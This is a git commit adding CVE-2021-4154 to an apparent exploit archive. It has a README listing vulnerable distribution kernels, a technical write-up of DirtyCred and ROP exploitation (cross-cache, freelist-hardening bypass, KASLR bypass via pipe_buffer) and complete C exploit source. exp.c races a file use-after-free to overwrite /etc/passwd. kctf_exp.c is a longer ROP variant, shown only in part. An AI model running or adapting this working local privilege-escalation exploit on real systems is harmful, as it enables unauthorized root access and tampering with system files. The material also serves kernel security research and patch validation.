添加漏洞CVE-2021-4154

2023-03-10 18:04:14 +08:00 · 2023-03-10 18:04:14 +08:00 · f385d25869
parent f592e883d5
commit f385d25869
6 changed files with 1345 additions and 0 deletions
--- a/cve/linux-kernel/2021/CVE-2021-4154/README.md
+++ b/cve/linux-kernel/2021/CVE-2021-4154/README.md
@ -0,0 +1,12 @@
+# CVE-2021-4154
+
+This bug was fix in https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3b0462726e7ef281c35a7a4ae33e93ee2bc9975b
+
+This exploit works on most pre-patch kernels for:
+
+* CentOS 8 kernels higher than linux-4.18.0-305.el8
+* Debian 11 kernels higher than 5.10.0-8
+* Fedora 31/32/33 kernels higher than 5.3.7-301.fc31
+* Ubuntu 18/20 kernels higher than 5.4.0-84 and 5.11.0-37.41
+
+Please feel free to send a PR to update README if you find it could work on other kernels.
--- a/cve/linux-kernel/2021/CVE-2021-4154/WRITEUP.md
+++ b/cve/linux-kernel/2021/CVE-2021-4154/WRITEUP.md
@ -0,0 +1,299 @@
+# BUG
+
+The bug has been patched in upstream, but remained unfixed in many vendors' kernels, e.g. CentOS.
+
+link to upstream's patch: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3b0462726e7ef281c35a7a4ae33e93ee2bc9975b
+
+# Primitive
+
+We could set an arbitrary fd to fsconfig and eventually, the `struct file` of the fd will be freed by fs context after closing it.
+
+So we gain an arbitrary free on file structure. I have proposed two different exploitation regarding this vulnerability. The first exploitation, by design, works among different versions of kernel on different architectures without **any** modification. The limitation is that it needs to overwrite a privileged file to gain privilege. If there is no such file, e.g. in a docker container, the approach won't work.
+
+The second exploitation gives you more power than the first exploitation, it is like the traditional exploitation that can read/write on any kernel memory and execute any code. The downside is that it is not scalable, modification is needed for different versions of kernel.
+
+# DirtyCred Exploitation
+
+The first exploitation is inspired by Jann Horn's [double-put exploit](https://bugs.chromium.org/p/project-zero/issues/detail?id=808). The vulnerability being exploited is similar to the one here: we could free a file structure while having a reference to it.
+
+Jann Horn's exploitation is brilliant: in a high-level view, it first opens an unprivileged file with write permission, then writes malicious content to it. During the time windows of checking permission and performing real writing, he replaced the underlying file structure with a privileged file structure(e.g. /etc/crontab, /etc/passwd), the malicious content will be written to the privileged file. 
+
+In reality, there is a large time window between checking the file's write permission and performing writing. The following code shows this issue: `vfs_writev` first **checks** if the file has write permission, then prepares the io and **performs writing** in `do_readv_writev`.
+
+In Jann's exploitation, he found a way to stabilize this exploitation. That he set up a userspace filesystem, where users can delay the time of importing user data (in `rw_copy_check_uvector`) to enlarge the time window of checking permission and performing writing. The userspace filesystem will cause a userfault in between these two operations. In the handler of userfault, he triggers the vulnerability to replace the file structure. After replacing the file structure, the malicious content will be written to the privileged file reliably.
+
+```c
+ssize_t vfs_writev(struct file *file, const struct iovec __user *vec,
+           unsigned long vlen, loff_t *pos)
+{ 
+    if (!(file->f_mode & FMODE_WRITE))
+        return -EBADF;
+    if (!(file->f_mode & FMODE_CAN_WRITE))
+        return -EINVAL;
+
+    return do_readv_writev(WRITE, file, vec, vlen, pos);
+}
+
+static ssize_t do_readv_writev(int type, struct file *file,
+                   const struct iovec __user * uvector,
+                   unsigned long nr_segs, loff_t *pos)
+{
+    size_t tot_len;
+    struct iovec iovstack[UIO_FASTIOV];
+    struct iovec *iov = iovstack;
+    ssize_t ret;
+    io_fn_t fn;
+    iov_fn_t fnv;
+    iter_fn_t iter_fn;
+
+    // userfault here
+    ret = rw_copy_check_uvector(type, uvector, nr_segs,
+                    ARRAY_SIZE(iovstack), iovstack, &iov);
+    if (ret <= 0)
+        goto out;
+
+    tot_len = ret;
+    ret = rw_verify_area(type, file, pos, tot_len);
+    if (ret < 0)
+        goto out;
+    // perform writing
+    ...
+}
+```
+After he released his exploitation, kernel fixed this issue by moving `rw_copy_check_uvector` ahead of permission check:
+
+```c
+static ssize_t vfs_writev(struct file *file, const struct iovec __user *vec,
+           unsigned long vlen, loff_t *pos, rwf_t flags)
+{
+    struct iovec iovstack[UIO_FASTIOV];
+    struct iovec *iov = iovstack;
+    struct iov_iter iter;
+    ssize_t ret;
+
+    // preparing io, where kernel could be paused using userfault
+    ret = import_iovec(WRITE, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
+    if (ret >= 0) {
+        file_start_write(file);
+        ret = do_iter_write(file, &iter, pos, flags);
+        file_end_write(file);
+        kfree(iov);
+    }
+    return ret;
+}
+
+static ssize_t do_iter_write(struct file *file, struct iov_iter *iter,
+        loff_t *pos, rwf_t flags)
+{
+    size_t tot_len;
+    ssize_t ret = 0;
+
+    // checking permission
+    if (!(file->f_mode & FMODE_WRITE))
+        return -EBADF;
+    if (!(file->f_mode & FMODE_CAN_WRITE))
+        return -EINVAL;
+
+    tot_len = iov_iter_count(iter);
+    if (!tot_len)
+        return 0;
+    ret = rw_verify_area(WRITE, file, pos, tot_len);
+    if (ret < 0)
+        return ret;
+
+    // performing writing
+    if (file->f_op->write_iter)
+        ret = do_iter_readv_writev(file, iter, pos, WRITE, flags);
+    else
+        ret = do_loop_readv_writev(file, iter, pos, WRITE, flags);
+    if (ret > 0)
+        fsnotify_modify(file);
+    return ret;
+}
+```
+
+Now, the procedure of writing a file is to
+1. handle userspace io (where userfault could pause the kernel)
+2. check the file permission
+3. perform file writing
+
+John's approach of stabilizing has been patched. It no longer works for latest kernel.
+
+## New way of stabilizing
+Since John's approach has been patched, I tried to figure out a new way to stabilize the exploitation while following the same high-level idea. And finally, I came up with a new approach to abusing file structure stably without using userfaultfd. The whole procedure is like the following. (please look at the raw txt for better layout)
+
+   Thread 0: slow write               Thread 1: cmd write                      Thread 3: exploit
+    __fdget_pos (no lock)            __fdget_pos (bypass lock)                             |
+        |                                  |                                               |
+        |                                  |                                               |
+        \/                                \/                                               |
+ ext4_file_write_iter (lock inode)    ext4_file_write_iter (wait for lock)                 |
+        |                                  |                                               |
+        |                                  |                                               |
+        \/                                 |                                               \/
+   normal write                            |                                      replace the file structure
+        |                                  |
+        |                                  |
+        \/                                 |
+write done, release inode lock             |
+                                          \/
+                                   get inode lock and then write
+                                           |
+                                          \/
+                                        write done
+
+### Racing write
+In short, we will have three threads:
+
+Thread 1 opens a writable file performing "slow write", which writes a very large amount of data to the file.
+
+Thread 2 opens the same file as the first thread, but it will write malicious data to it.
+
+Thread 3 will trigger the vulnerability and replace the underlying structure. (replace means freeing the file struct in thread 1 and 2, and reclaiming the memory slot of file structure with a privileged file structure)
+
+### Prevent lock in __fdget_pos
+```c
+unsigned long __fdget_pos(unsigned int fd)
+{
+    unsigned long v = __fdget(fd);
+    struct file *file = (struct file *)(v & ~3);
+
+    if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
+        if (file_count(file) > 1) {
+            v |= FDPUT_POS_UNLOCK;
+            mutex_lock(&file->f_pos_lock);
+        }
+    }
+    return v;
+}
+```
+In `__fdget_pos`, if the current file has `FMODE_ATOMIC_POS` flag and has more than 1 refcount, there will be a lock to preventing a racing write. Once the file is locked, kernel will wait before performing writing. This is to prevent a file from being written in multiple threads, causing data loss. In our scenario, Since we open the same file in two different threads, which will have at least 3 refcount. So the kernel will pause in `__fdget_pos` waiting for the lock. However, this lock is before the permission check, locking the kernel here can't enlarge the time windows between checking and writing. As such, we should remove `FMODE_ATOMIC_POS` to prevent lock in the `__fdget_pos`.
+
+```c
+    /* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
+    if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode))
+        f->f_mode |= FMODE_ATOMIC_POS;
+```
+In `open` syscall, as long as the file is a regular file, it will have `FMODE_ATOMIC_POS` set. At first, I found that for files we have write permission, they are all regular files. After searching the kernel code, I realized that a soft link file will bypass this check so that it will not have `FMODE_ATOMIC_POS` set. As such, we could prevent the kernel  from being stuck in `__fdget_pos` function.
+
+### Lock in ext4_file_write_iter
+
+```c
+static ssize_t
+ext4_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+{
+    struct inode *inode = file_inode(iocb->ki_filp);
+    int o_direct = iocb->ki_flags & IOCB_DIRECT;
+    int unaligned_aio = 0;
+    int overwrite = 0;
+    ssize_t ret;
+
+    if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
+        return -EIO;
+
+#ifdef CONFIG_FS_DAX
+    if (IS_DAX(inode))
+        return ext4_dax_write_iter(iocb, from);
+#endif
+
+    if (!inode_trylock(inode)) {
+        if (iocb->ki_flags & IOCB_NOWAIT)
+            return -EAGAIN;
+        inode_lock(inode);
+    }
+    ...
+}
+```
+
+In `ext4_file_write_iter`, to prevent racing, it has a lock for inode. If a thread is writing a file and there is another thread writing to the same file, the second write will be paused until the inode lock is released. The good news is that this lock is in between the checking and writing.
+
+So the idea is that in 1st thread, we write the file with a large amount of data, which will lock the inode for a period of time. Then in the 2nd thread, we write to the same file, we make sure kernel will not be stuck in `__fdget_pos`, then it goes to `ext4_file_write_iter` waiting for the lock of inode. At this time, we trigger the vulnerability and replace the file structure in thread 2 with a privileged file. When 2nd thread gets the lock, it will write to the privileged file with the malicious that we control. 
+
+This technique is simple, but it only utilizes functions available in the default kernel configuration. I have attached the exploit that I wrote utilizing this method. It works on any architecture and any version of kernel as long as the kernel is vulnerable.
+
+# ROP exploitation
+Tl;dr,
+1. Cross cache to corrupt memory from `file` object to `msg_msg`.
+2. FREELIST_HARDENED could be bypassed, as I described [before](https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game). Current freelist hardening is weak.
+3. Use `pipe_buffer` as an  **elastic** object to bypass kaslr and hijack kernel execution.
+
+
+## Cross Cache
+The cross-cache technique is simple, to cross cache from `filp` cache, I opened a lot of files and then free a bunch of them, which will free the slab cache of `filp`. Then I spray `struct msgseg` to reclaim the freed `filp` cache. One thing we should be careful about is that using a spray object whose slab cache's page size is the same as `filp` cache could improve the reliability.
+
+## Bypass Freelist Hardened
+Most people believe that bypassing freelist hardening requires leak of a xor'ed freelist pointer and a heap address, so that attackers can get the magic value (I have seen this claim in many academic papers). However, in reality, we could leak the magic without knowing heap address. And we can even leak heap address from xor'ed freelist pointer.
+
+```c
+static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
+{
+    unsigned long freeptr_addr = (unsigned long)object + s->offset;
+
+#ifdef CONFIG_SLAB_FREELIST_HARDENED
+    BUG_ON(object == fp); /* naive detection of double free or corruption */
+#endif
+
+    *(void **)freeptr_addr = freelist_ptr(s, fp, freeptr_addr);
+}
+```
+
+The weakness existing in freelist hardening is that if current freelist pointer is 0, which means no object is in the freelist,  the `fp` here will be 0 as well. As such, the xor'ed freelist pointer will be
+```
+magic_value ^ 0
+```
+which is the magic value itself. Leaking this value will easily bypass the freelist hardening.
+
+In my exploitation, after crossing cache, I free the file structure through the vulnerability again, which will leave the xor'ed value on the heap, and could be obtained by reading the content of msg in userspace.
+
+
+### Leak heap address
+Since we have the magic value, I did the following operations to get the heap address.
+
+1. reclaim the object (obj_A) freed by the vulnerability.
+2. free an object (obj_B) in the same cache, and then free the obj_A again.
+
+After this, the freelist pointer in obj_A will be
+```
+address_of_obj_B ^ magic_value
+```
+
+Leaking the content of obj_A gives me the heap address of obj_B
+
+
+## Elastic object to bypass kaslr and hijack kernel execution
+In [Andy's write-up](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html), he utilized `struct pipe_buffer` to bypass kaslr and hijack execution. However, the normal allocation of `struct pipe_buffer` will go to kmalloc-1k. Which doesn't fullfill our scenario. We are using kmalloc-512.
+
+[A elastic object](https://zplin.me/papers/ELOISE.pdf) means it could be allocated into any general kernel cache, depending on user input.
+
+The `struct pipe_buffer` could be an elastic object, looking at the following code:
+
+```c
+int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
+{
+    struct pipe_buffer *bufs;
+    unsigned int head, tail, mask, n;
+
+    /*
+     * We can shrink the pipe, if arg is greater than the ring occupancy.
+     * Since we don't expect a lot of shrink+grow operations, just free and
+     * allocate again like we would do for growing.  If the pipe currently
+     * contains more buffers than arg, then return busy.
+     */
+    mask = pipe->ring_size - 1;
+    head = pipe->head;
+    tail = pipe->tail;
+    n = pipe_occupancy(pipe->head, pipe->tail);
+    if (nr_slots < n)
+        return -EBUSY;
+
+    bufs = kcalloc(nr_slots, sizeof(*bufs),
+               GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
+    if (unlikely(!bufs))
+        return -ENOMEM;
+}
+```
+It turns out the variable `nr_slots` can be controlled by users using syscall `fcntl`. Users can specify arbitrary value to allocate `pipe_buffer` into desired cache. In my case, I used 0x8 and 0xa. This is useful, because this is a very common property existing in android and general kernel, how to use `pipe_buffer` to leak kaslr and hijacking kernel execution could be referenced in Andy's write-up
+
+## ROP
+
+the ROP part shares a lot of similarities with [Andy's write-up](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html).
--- a/cve/linux-kernel/2021/CVE-2021-4154/exp.c
+++ b/cve/linux-kernel/2021/CVE-2021-4154/exp.c
@ -0,0 +1,325 @@
+#define _GNU_SOURCE
+
+#include <endian.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stdarg.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/mount.h>
+#include <sys/prctl.h>
+#include <sys/resource.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <assert.h>
+#include <pthread.h>
+#include <sys/uio.h>
+
+#include <linux/bpf.h>
+#include <linux/kcmp.h>
+
+#include <linux/capability.h>
+
+static void die(const char *fmt, ...) {
+  va_list params;
+
+  va_start(params, fmt);
+  vfprintf(stderr, fmt, params);
+  va_end(params);
+  exit(1);
+}
+
+static void use_temporary_dir(void) {
+  system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
+  char *tmpdir = "exp_dir";
+  if (!tmpdir)
+    exit(1);
+  if (chmod(tmpdir, 0777))
+    exit(1);
+  if (chdir(tmpdir))
+    exit(1);
+}
+
+static bool write_file(const char *file, const char *what, ...) {
+  char buf[1024];
+  va_list args;
+  va_start(args, what);
+  vsnprintf(buf, sizeof(buf), what, args);
+  va_end(args);
+  buf[sizeof(buf) - 1] = 0;
+  int len = strlen(buf);
+  int fd = open(file, O_WRONLY | O_CLOEXEC);
+  if (fd == -1)
+    return false;
+  if (write(fd, buf, len) != len) {
+    int err = errno;
+    close(fd);
+    errno = err;
+    return false;
+  }
+  close(fd);
+  return true;
+}
+
+static void setup_common() {
+  if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) {
+  }
+}
+
+static void loop();
+
+static void sandbox_common() {
+  prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
+  setsid();
+  struct rlimit rlim;
+  rlim.rlim_cur = rlim.rlim_max = (200 << 20);
+  setrlimit(RLIMIT_AS, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 32 << 20;
+  setrlimit(RLIMIT_MEMLOCK, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 136 << 20;
+  setrlimit(RLIMIT_FSIZE, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 1 << 20;
+  setrlimit(RLIMIT_STACK, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 0;
+  setrlimit(RLIMIT_CORE, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 256;
+  setrlimit(RLIMIT_NOFILE, &rlim);
+  if (unshare(CLONE_NEWNS)) {
+  }
+  if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
+  }
+  if (unshare(CLONE_NEWIPC)) {
+  }
+  if (unshare(0x02000000)) {
+  }
+  if (unshare(CLONE_NEWUTS)) {
+  }
+  if (unshare(CLONE_SYSVSEM)) {
+  }
+  typedef struct {
+    const char *name;
+    const char *value;
+  } sysctl_t;
+  static const sysctl_t sysctls[] = {
+      {"/proc/sys/kernel/shmmax", "16777216"},
+      {"/proc/sys/kernel/shmall", "536870912"},
+      {"/proc/sys/kernel/shmmni", "1024"},
+      {"/proc/sys/kernel/msgmax", "8192"},
+      {"/proc/sys/kernel/msgmni", "1024"},
+      {"/proc/sys/kernel/msgmnb", "1024"},
+      {"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
+  };
+  unsigned i;
+  for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
+    write_file(sysctls[i].name, sysctls[i].value);
+}
+
+static int wait_for_loop(int pid) {
+  if (pid < 0)
+    exit(1);
+  int status = 0;
+  while (waitpid(-1, &status, __WALL) != pid) {
+  }
+  return WEXITSTATUS(status);
+}
+
+static void drop_caps(void) {
+  struct __user_cap_header_struct cap_hdr = {};
+  struct __user_cap_data_struct cap_data[2] = {};
+  cap_hdr.version = _LINUX_CAPABILITY_VERSION_3;
+  cap_hdr.pid = getpid();
+  if (syscall(SYS_capget, &cap_hdr, &cap_data))
+    exit(1);
+  const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE);
+  cap_data[0].effective &= ~drop;
+  cap_data[0].permitted &= ~drop;
+  cap_data[0].inheritable &= ~drop;
+  if (syscall(SYS_capset, &cap_hdr, &cap_data))
+    exit(1);
+}
+
+static int real_uid;
+static int real_gid;
+__attribute__((aligned(64 << 10))) static char sandbox_stack[1 << 20];
+
+static int namespace_sandbox_proc() {
+  sandbox_common();
+  loop();
+}
+
+static int do_sandbox_namespace() {
+  setup_common();
+  real_uid = getuid();
+  real_gid = getgid();
+  mprotect(sandbox_stack, 4096, PROT_NONE);
+
+  while (1) {
+    int pid =
+        clone(namespace_sandbox_proc, &sandbox_stack[sizeof(sandbox_stack) - 64],
+              CLONE_NEWUSER | CLONE_NEWPID, 0);
+    int ret_status = wait_for_loop(pid);
+    if (ret_status == 0) {
+      printf("[!] succeed\n");
+      sleep(1);
+      printf("[*] checking /etc/passwd\n\n");
+      printf("[*] executing command : head -n 5 /etc/passwd\n");
+      sleep(1);
+      system("head -n 5 /etc/passwd");
+      return 1;
+    } else {
+      printf("[-] failed to write, retry...\n\n");
+      sleep(3);
+    }
+  }
+}
+
+// ===========================
+
+#ifndef __NR_fsconfig
+#define __NR_fsconfig 431
+#endif
+#ifndef __NR_fsopen
+#define __NR_fsopen 430
+#endif
+
+#define MAX_FILE_NUM 1000
+int uaf_fd;
+int fds[MAX_FILE_NUM];
+
+int run_write = 0;
+int run_spray = 0;
+char *cwd;
+
+void *slow_write() {
+  printf("[*] start slow write to get the lock\n");
+  int fd = open("./uaf", 1);
+
+  if (fd < 0) {
+    perror("error open uaf file");
+    exit(-1);
+  }
+
+  unsigned long int addr = 0x30000000;
+  int offset;
+  for (offset = 0; offset < 0x80000; offset++) {
+    void *r = mmap((void *)(addr + offset * 0x1000), 0x1000,
+                   PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
+    if (r < 0) {
+      printf("allocate failed at 0x%x\n", offset);
+    }
+  }
+
+  assert(offset > 0);
+
+  void *mem = (void *)(addr);
+  memcpy(mem, "hhhhh", 5);
+
+  struct iovec iov[5];
+  for (int i = 0; i < 5; i++) {
+    iov[i].iov_base = mem;
+    iov[i].iov_len = (offset - 1) * 0x1000;
+  }
+
+  run_write = 1;
+  if (writev(fd, iov, 5) < 0) {
+    perror("slow write");
+  }
+  printf("[*] write done!\n");
+}
+
+void *write_cmd() {
+  char data[1024] = "\nDirtyCred works!\n\n";
+  struct iovec iov = {.iov_base = data, .iov_len = strlen(data)};
+
+  while (!run_write) {
+  }
+  run_spray = 1;
+  if (writev(uaf_fd, &iov, 1) < 0) {
+    printf("failed to write\n");
+  }
+  printf("[*] overwrite done! It should be after the slow write\n");
+}
+
+int spray_files() {
+
+  while (!run_spray) {
+  }
+  int found = 0;
+
+  printf("[*] got uaf fd %d, start spray....\n", uaf_fd);
+  for (int i = 0; i < MAX_FILE_NUM; i++) {
+    fds[i] = open("/etc/passwd", O_RDONLY);
+    if (fds[i] < 0) {
+      perror("open file");
+      printf("%d\n", i);
+    }
+    if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, fds[i]) ==
+        0) {
+      found = 1;
+      printf("[!] found, file id %d\n", i);
+      for (int j = 0; j < i; j++)
+        close(fds[j]);
+      break;
+    }
+  }
+
+  if (found) {
+    sleep(4);
+    return 0;
+  }
+  return -1;
+}
+
+void trigger() {
+  int fs_fd = syscall(__NR_fsopen, "cgroup", 0);
+  if (fs_fd < 0) {
+    perror("fsopen");
+    die("");
+  }
+
+  symlink("./data", "./uaf");
+
+  uaf_fd = open("./uaf", 1);
+  if (uaf_fd < 0) {
+    die("failed to open symbolic file\n");
+  }
+
+  if (syscall(__NR_fsconfig, fs_fd, 5, "source", 0, uaf_fd)) {
+    perror("fsconfig");
+    exit(-1);
+  }
+  // free the uaf fd
+  close(fs_fd);
+}
+
+void loop() {
+  trigger();
+
+  pthread_t p_id;
+  pthread_create(&p_id, NULL, slow_write, NULL);
+
+  pthread_t p_id_cmd;
+  pthread_create(&p_id_cmd, NULL, write_cmd, NULL);
+  exit(spray_files());
+}
+
+int main(void) {
+  cwd = get_current_dir_name();
+  syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
+  syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
+  syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
+  use_temporary_dir();
+  do_sandbox_namespace();
+  return 0;
+}
+
--- a/cve/linux-kernel/2021/CVE-2021-4154/kctf_exp.c
+++ b/cve/linux-kernel/2021/CVE-2021-4154/kctf_exp.c
@ -0,0 +1,688 @@
+#define _GNU_SOURCE
+
+#include <endian.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stdarg.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/mount.h>
+#include <sys/prctl.h>
+#include <sys/resource.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <assert.h>
+#include <pthread.h>
+#include <sys/uio.h>
+#include <x86intrin.h>
+
+#include <err.h>
+
+#include <sys/types.h>
+#include <sys/ipc.h>
+#include <sys/msg.h>
+
+#include <linux/capability.h>
+
+void DumpHex(const void *data, size_t size) {
+  char ascii[17];
+  size_t i, j;
+  ascii[16] = '\0';
+  for (i = 0; i < size; ++i) {
+    printf("%02X ", ((unsigned char *)data)[i]);
+    if (((unsigned char *)data)[i] >= ' ' &&
+        ((unsigned char *)data)[i] <= '~') {
+      ascii[i % 16] = ((unsigned char *)data)[i];
+    } else {
+      ascii[i % 16] = '.';
+    }
+    if ((i + 1) % 8 == 0 || i + 1 == size) {
+      printf(" ");
+      if ((i + 1) % 16 == 0) {
+        printf("|  %s \n", ascii);
+      } else if (i + 1 == size) {
+        ascii[(i + 1) % 16] = '\0';
+        if ((i + 1) % 16 <= 8) {
+          printf(" ");
+        }
+        for (j = (i + 1) % 16; j < 16; ++j) {
+          printf("   ");
+        }
+        printf("|  %s \n", ascii);
+      }
+    }
+  }
+}
+
+void pin_on_cpu(int cpu) {
+  cpu_set_t cpu_set;
+  CPU_ZERO(&cpu_set);
+  CPU_SET(cpu, &cpu_set);
+  if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) {
+    perror("sched_setaffinity()");
+    exit(EXIT_FAILURE);
+  }
+  usleep(1000);
+}
+
+static void die(const char *fmt, ...) {
+  va_list params;
+
+  va_start(params, fmt);
+  vfprintf(stderr, fmt, params);
+  va_end(params);
+  exit(1);
+}
+
+static void use_temporary_dir(void) {
+  system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data;");
+  char *tmpdir = "exp_dir";
+  if (!tmpdir)
+    exit(1);
+  if (chmod(tmpdir, 0777))
+    exit(1);
+  if (chdir(tmpdir))
+    exit(1);
+}
+
+static bool write_file(const char *file, const char *what, ...) {
+  char buf[1024];
+  va_list args;
+  va_start(args, what);
+  vsnprintf(buf, sizeof(buf), what, args);
+  va_end(args);
+  buf[sizeof(buf) - 1] = 0;
+  int len = strlen(buf);
+  int fd = open(file, O_WRONLY | O_CLOEXEC);
+  if (fd == -1)
+    return false;
+  if (write(fd, buf, len) != len) {
+    int err = errno;
+    close(fd);
+    errno = err;
+    return false;
+  }
+  close(fd);
+  return true;
+}
+
+static void setup_common() {
+  if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) {
+  }
+}
+
+static void loop();
+
+static void sandbox_common() {
+  prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
+  setsid();
+  struct rlimit rlim;
+  rlim.rlim_cur = rlim.rlim_max = (200 << 20);
+  setrlimit(RLIMIT_AS, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 32 << 20;
+  setrlimit(RLIMIT_MEMLOCK, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 136 << 20;
+  setrlimit(RLIMIT_FSIZE, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 1 << 20;
+  setrlimit(RLIMIT_STACK, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 0;
+  setrlimit(RLIMIT_CORE, &rlim);
+  rlim.rlim_cur = rlim.rlim_max = 0x8000;
+  setrlimit(RLIMIT_NOFILE, &rlim);
+  if (unshare(CLONE_NEWNS)) {
+  }
+  typedef struct {
+    const char *name;
+    const char *value;
+  } sysctl_t;
+  static const sysctl_t sysctls[] = {
+      {"/proc/sys/kernel/shmmax", "16777216"},
+      {"/proc/sys/kernel/shmall", "536870912"},
+      {"/proc/sys/kernel/shmmni", "1024"},
+      {"/proc/sys/kernel/msgmax", "0x8000"},
+      {"/proc/sys/kernel/msgmni", "1024"},
+      {"/proc/sys/kernel/msgmnb", "1024"},
+      {"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
+  };
+  unsigned i;
+  for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
+    write_file(sysctls[i].name, sysctls[i].value);
+}
+
+static int wait_for_loop(int pid) {
+  if (pid < 0)
+    exit(1);
+  int status = 0;
+  while (waitpid(-1, &status, __WALL) != pid) {
+  }
+  return WEXITSTATUS(status);
+}
+
+static void drop_caps(void) {
+  struct __user_cap_header_struct cap_hdr = {};
+  struct __user_cap_data_struct cap_data[2] = {};
+  cap_hdr.version = _LINUX_CAPABILITY_VERSION_3;
+  cap_hdr.pid = getpid();
+  if (syscall(SYS_capget, &cap_hdr, &cap_data))
+    exit(1);
+  const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE);
+  cap_data[0].effective &= ~drop;
+  cap_data[0].permitted &= ~drop;
+  cap_data[0].inheritable &= ~drop;
+  if (syscall(SYS_capset, &cap_hdr, &cap_data))
+    exit(1);
+}
+
+static int real_uid;
+static int real_gid;
+__attribute__((aligned(64 << 10))) static char sandbox_stack[1 << 20];
+
+static void pre_exploit();
+static void exploit();
+void functionA () {
+   printf("This is functionA\n");
+}
+static int namespace_sandbox_proc() {
+
+  atexit(functionA);
+  sandbox_common();
+  pre_exploit();
+  exploit();
+  exit(1);
+}
+
+static int do_sandbox_namespace() {
+  setup_common();
+  real_uid = getuid();
+  real_gid = getgid();
+  mprotect(sandbox_stack, 4096, PROT_NONE);
+
+  int pid =
+      clone(namespace_sandbox_proc, &sandbox_stack[sizeof(sandbox_stack) - 64], CLONE_NEWUSER, 0);
+  return wait_for_loop(pid);
+}
+
+// ===========================
+
+#ifndef __NR_fsconfig
+#define __NR_fsconfig 431
+#endif
+#ifndef __NR_fsopen
+#define __NR_fsopen 430
+#endif
+
+#define MAX_FILE_NUM 10000
+#define MAX_MSG_SPRAY 800
+#define MAX_PIPE_NUM 100
+
+int uaf_fd;
+int fs_fd_1, fs_fd_2, fs_fd_3;
+
+unsigned long kaslr_offset;
+
+int fds[MAX_FILE_NUM];
+int msg_ids[MAX_FILE_NUM];
+int pipes[2*MAX_PIPE_NUM][2];
+
+/* spray 256 */
+struct msg {
+  long mtype;
+  char data[];
+};
+
+void setup_uaf() {
+  fs_fd_1 = syscall(__NR_fsopen, "cgroup", 0);
+  if (fs_fd_1 < 0) {
+    perror("fsopen");
+    die("");
+  }
+
+  fs_fd_2 = syscall(__NR_fsopen, "cgroup", 0);
+  if (fs_fd_2 < 0) {
+    perror("fsopen");
+    die("");
+  }
+
+  // fs_fd_3 = syscall(__NR_fsopen, "cgroup", 0);
+  // if (fs_fd_3 < 0) {
+  //   perror("fsopen");
+  //   die("");
+  // }
+}
+
+void set_uaffd() {
+  if (uaf_fd < 0) {
+    die("failed to open uaf file\n");
+  }
+  printf("opened uaf fd: %d\n", uaf_fd);
+
+  if (syscall(__NR_fsconfig, fs_fd_1, 5, "source", 0, uaf_fd)) {
+    perror("fsconfig");
+    exit(-1);
+  }
+
+  if (syscall(__NR_fsconfig, fs_fd_2, 5, "source", 0, uaf_fd)) {
+    perror("fsconfig");
+    exit(-1);
+  }
+
+  // if (syscall(__NR_fsconfig, fs_fd_3, 5, "source", 0, uaf_fd)) {
+  //   perror("fsconfig");
+  //   exit(-1);
+  // }
+}
+
+int do_exp(void) {
+  syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
+  syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
